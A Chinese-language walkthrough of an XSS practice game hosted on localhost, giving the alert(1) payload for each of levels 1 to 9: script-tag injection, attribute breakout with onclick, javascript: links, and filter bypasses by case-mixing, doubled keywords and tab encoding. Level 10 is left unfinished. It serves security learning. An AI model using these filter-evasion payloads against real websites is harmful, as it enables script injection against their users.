xss挑战之旅wp

Level 1  -  180831

第一关很简单,开胃菜

payload: http://localhost/xss_game/level1.php?name=test123<script>alert(1)</script>

xss挑战之旅wp

 

Level 2  -  180831

找到两个思路:

payload: test123"><script>alert(1)</script>#

xss挑战之旅wp

第一个点被转义了,但是第二个点正常。

只要能实现标签和引号闭合就可以了。

第二种思路是借鉴别人wp,通过onclick点击事件弹窗。

payload: " onclick="alert(1)     

xss挑战之旅wp

 

Level 3  -  180901

这次使用的是单引号,和第二关思路相同

payload: ' onclick='alert(1)

xss挑战之旅wp

 

 

Level 4  -  180901

和第三关差不多

payload: " onclick="alert(1)

xss挑战之旅wp

 

Level 5  -  180901

<script>会被替换成<scr_ipt>,onclick被替换成o_nclick

payload: "><a href=javascript:alert(1)>

xss挑战之旅wp

 点击如图即可执行javascript:alert(1):

 xss挑战之旅wp

 

Level 6  -  180901

这次过滤了href以及第5关的onclock、script

但是没有过滤大小写

payload: " oNclick="alert(1)

xss挑战之旅wp

 

Level 7  -  180901

这次自动删除on关键字,使用重叠关键字写法:

payload: " oOnNclick="alert(1)

 xss挑战之旅wp

 

Level 8  -  180901

发现javascript会被转义,

payload: javascript:alert(1) 

或者javascrip%09t:alert(1)

xss挑战之旅wp

Level 9  -  180901

有两个点,都尝试一下:

 尝试payload: "onclick=alert(1)

发现"被转义了

xss挑战之旅wp

尝试使用第二个点进行xss测试:

使用tab的%09,或者 t 转义成t

payload: javascrip%09t:alert(1)//http://123.com

或者: javascript:alert(1)//http://123.com

xss挑战之旅wp

xss挑战之旅wp

 Level 10  -  180901

与第一关类似都是发送get请求,但是发现<>被转义了。

未完成。。。

上一篇:BZOJ.4819.[SDOI2017]新生舞会(01分数规划 费用流SPFA)


下一篇:UIApplication sharedApplication详细解释-IOS